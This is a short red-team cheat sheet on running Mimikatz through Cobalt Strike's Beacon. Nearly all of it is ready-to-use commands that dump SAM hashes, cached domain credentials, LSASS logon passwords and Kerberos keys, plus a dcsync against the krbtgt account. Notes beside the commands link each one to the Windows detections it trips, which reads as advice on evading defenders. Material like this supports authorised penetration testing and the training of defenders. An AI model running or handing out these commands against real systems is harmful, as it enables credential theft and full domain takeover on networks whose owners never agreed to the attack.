MimiKatz
Cobalt Strike + MimiKatz
Cobalt Strike's built in Mimikatz executes each new mimikatz command in a new temporary process, which is then destroyed after it finishes. Because of this, we will need to chain our mimikatz commands.
beacon> mimikatz token::elevate ; lsadump::samModifier Keys
!
In most cases, ! is a direct replacement for token::elevate. For example:
beacon> mimikatz !lsadump::sam@
The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync.
beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgtDumping Security Account Manager (SAM)
beacon> mimikatz !lsadump::samNote: This opens a handle to the SAM registry Hive. "Suspicious SAM Hive Handle".
Dumping Cached Domain Credentials (DCC)
beacon> mimikatz !lsadump::cacheWe can crack the hashes with hashcat. Example hashes can be found here.
Note: This handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle".
Dumping NTLM Hashes
beacon> mimikatz !sekurlsa::logonpasswordsNote: Mimikatz's logonpasswords module will open a read handle to LSASS, which is logged under the winevent 4656. "Suspicious Handle to LSASS". Use this cautiously, and only if needed.
Dumping Kerberos Encryption Keys
beacon> mimikatz !sekurlsa::ekeysNote: This module also opens a read handle to LSASS.
Last updated